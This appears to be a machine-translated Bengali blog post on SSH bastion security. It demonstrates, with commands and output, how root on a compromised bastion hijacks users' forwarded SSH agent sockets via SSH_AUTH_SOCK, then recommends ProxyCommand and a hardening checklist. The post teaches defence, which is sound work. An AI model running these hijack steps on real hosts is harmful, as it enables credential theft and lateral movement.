আমি প্রক্সি জম্প সম্পর্কে উত্তরটি দেখেছি। প্রক্সিকমন্ড সম্পর্কে কথা বলা যাক ।
তবে অপেক্ষা করুন, অপেক্ষা করুন! আমি আপনাকে লিখতে পারি যে কীভাবে সার্ভার হ্যাক করবেন যা এজেন্ট ফরোয়ার্ডিং ব্যবহার করে, এটি পার্থক্যটি বোঝা আরও সহজ হবে!
আসুন হ্যাক!
প্রাথমিক পদক্ষেপের জন্য: আপনি আমার পোস্টটি এখানে পড়তে পারেন
বেসিক পদক্ষেপগুলি নিম্নলিখিত:
- দুর্গ ব্যবহারকারীদের তৈরি করুন
- রুট লগইন অক্ষম করুন
- হ্যাকিংয়ের প্রচেষ্টা অবরুদ্ধ করুন
- পোর্ট পরিবর্তন করুন
- ফায়ারওয়াল কনফিগার করুন
- সেলিনাক্স কনফিগার করুন
এজেন্ট ফরওয়ার্ডিং কীভাবে ব্যবহার করবেন
Config / .ssh / config এ কনফিগার করুন
Host bast
Hostname BASTION_IP
ForwardAgent yes
User bastion
-এসএস-এজেন্টে আপনার প্রমাণীকরণ কী যুক্ত করুন
ssh-add ~/.ssh/name_rsa
-ঘাঁটি হোস্টের সাথে সংযোগ স্থাপন করুন
ssh bast
-ঘাঁটি থেকে অ্যাপ্লিকেশন সার্ভার সংযোগ করুন
ssh app@IP -p PORT
হ্যাকিং!
আপনি, ভাল, আমাকে প্রশ্ন জিজ্ঞাসা করতে পারেন:
আপনি যদি বেসমেন্ট হোস্টের সাথে আপস করেন তবে সার্ভারগুলি হ্যাক করবেন কীভাবে?
ট্র্যাক লক্ষ্য
/ টিএমপি ডিরেক্টরিতে আপনি এর মতো কিছু দেখতে পাবেন:
[root@localhost tmp]# ll
total 12
drwx------ 2 bastion bastion 4096 Sep 7 17:35 ssh-mKX88v0Vlo
অস্থায়ী ফাইল খুলুন
[root@localhost tmp]# cd ssh-mKX88v0Vlo/
[root@localhost ssh-mKX88v0Vlo]# ll
total 0
srwxr-xr-x 1 bastion bastion 0 Sep 7 17:35 agent.10507
আসুন এই প্রক্রিয়া আইডির সংযোগগুলি দেখুন ।
netstat -nxp | grep 10507
ফলাফল:
unix [ ] STREAM CONNECTED 501384 10507/sshd: bastion
এবং কে সংযুক্ত?
lsof -i -a -p 10507
ফলাফল:
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
sshd 10507 bastion 3u IPv4 501301 0t0 TCP *IP*:ssh->*IP*:8279 (ESTABLISHED)
আমরা সকেট ফাইলগুলিও দেখতে পারি:
cd /proc/10507/fd/
ls
ফলাফল:
lrwx------ 1 root root 64 Sep 7 17:46 0 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 1 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 10 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:46 14 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:46 15 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:46 2 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 3 -> socket:[501994]
lrwx------ 1 root root 64 Sep 7 17:46 4 -> socket:[502069]
lrwx------ 1 root root 64 Sep 7 17:46 5 -> socket:[502072]
l-wx------ 1 root root 64 Sep 7 17:46 6 -> /run/systemd/sessions/1836.ref
lr-x------ 1 root root 64 Sep 7 17:46 7 -> pipe:[502079]
l-wx------ 1 root root 64 Sep 7 17:46 8 -> pipe:[502079]
lrwx------ 1 root root 64 Sep 7 17:46 9 -> socket:[502080]
এবং ক্লায়েন্ট দূরবর্তী সার্ভারের সাথে সংযুক্ত হবে তখন কী ঘটে ? দেখা যাক:
lrwx------ 1 root root 64 Sep 7 17:46 0 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 1 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 10 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:48 11 -> socket:[502267]
lrwx------ 1 root root 64 Sep 7 17:46 14 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:46 15 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:46 2 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 3 -> socket:[501994]
lrwx------ 1 root root 64 Sep 7 17:46 4 -> socket:[502069]
lrwx------ 1 root root 64 Sep 7 17:46 5 -> socket:[502072]
l-wx------ 1 root root 64 Sep 7 17:46 6 -> /run/systemd/sessions/1836.ref
lr-x------ 1 root root 64 Sep 7 17:46 7 -> pipe:[502079]
l-wx------ 1 root root 64 Sep 7 17:46 8 -> pipe:[502079]
lrwx------ 1 root root 64 Sep 7 17:46 9 -> socket:[502080]
এমনকি আমরা দেখতে পাচ্ছি যে সকেট ফাইল নেটস্ট্যাট ব্যবহার করে ব্যবহৃত হচ্ছে:
unix 3 [ ] STREAM CONNECTED 502267 10561/sshd:
bastion /tmp/ssh-oVoMXC6vb8/agent.10561
unix 3 [ ] STREAM CONNECTED 502072 10561/sshd: bastion
সকেটের তথ্য এবং আইপি ঠিকানা চুরি করুন
এখন আমরা সকেট তথ্য চুরি করার জন্য যখন Bastion হোস্ট অধিবেশন প্রয়োজন খোলা । ওহ, আমাদেরও গন্তব্য সার্ভার আইপি দরকার , তাই কেবল নেটস্ট্যাট ব্যবহার করুন:
netstat -tn
চূড়ান্ত পদক্ষেপ ব্যবহার করতে ফরওয়ার্ড সকেট ফাইল
eval "$(ssh-agent -s)"
SSH_AUTH_SOCK=/tmp/ssh-EAKxOdL4fl/agent.10507
কীটি বোঝা হয়েছে কিনা তা পরীক্ষা করুন ।
ssh-add -l
ফলে কিছু হওয়া উচিত যে ভালো :
2048 SHA256:2Psdl..B5KQ /home/usr/.ssh/name_rsa (RSA)
সার্ভার হ্যাক হয়েছে, কীভাবে সুরক্ষা সমস্যা সমাধান করবেন?
প্রক্সি কমান্ড
Host app
Hostname *.*.*.*
IdentityFile ~/.ssh/your_rsa
User *******
Port ****
ProxyCommand ssh -W %h:%p bast
Host bast
Hostname *.*.*.*
ForwardAgent no
User ******
প্রাথমিক ক্রিয়াকলাপগুলির জন্য: সার্ভারগুলির মাধ্যমে কীভাবে ফাইলগুলি স্থানান্তর করতে হয় (ক্লায়েন্ট থেকে সার্ভার, ক্লায়েন্টে ক্লায়েন্টে), আপনি আমার পোস্টে এখানে পড়তে পারেন
উপসংহার
- যদি আপনি বাশান হোস্ট ব্যবহার করেন তবে এজেন্ট ফরওয়ার্ডিং ব্যবহার করবেন না তবে প্রক্সিকম্যান্ড ব্যবহার করুন
- প্রমাণীকরণের জন্য সর্বদা অ-রুট ব্যবহারকারী ব্যবহার করুন
- ফায়ারওয়াল ব্যবহার করুন এবং সমস্ত অপ্রয়োজনীয় সংযোগগুলি ব্লক করুন।
- সেলিনাক্স ব্যবহার করুন (সাধারণভাবে)
- যে আইপি ঠিকানাটি ভুল শংসাপত্রগুলি দিয়ে বেশ কয়েকবার লগ ইন করার চেষ্টা করে তাকে অবরুদ্ধ করুন
- এটি প্রয়োজনীয় না হলে ব্যবহারকারীকে সুডো অনুমতি দেবেন না
- আপনার সার্ভার নিরীক্ষণ
- সুরক্ষা প্যাচগুলির জন্য আপনার সার্ভার আপডেট করুন
আরও তথ্য, আমার ব্লগ দেখুন । অতিরিক্তভাবে আমার কাছে কিছু স্ক্রিনশট রয়েছে, তাই এটি আপনার জন্য সহায়ক হতে পারে।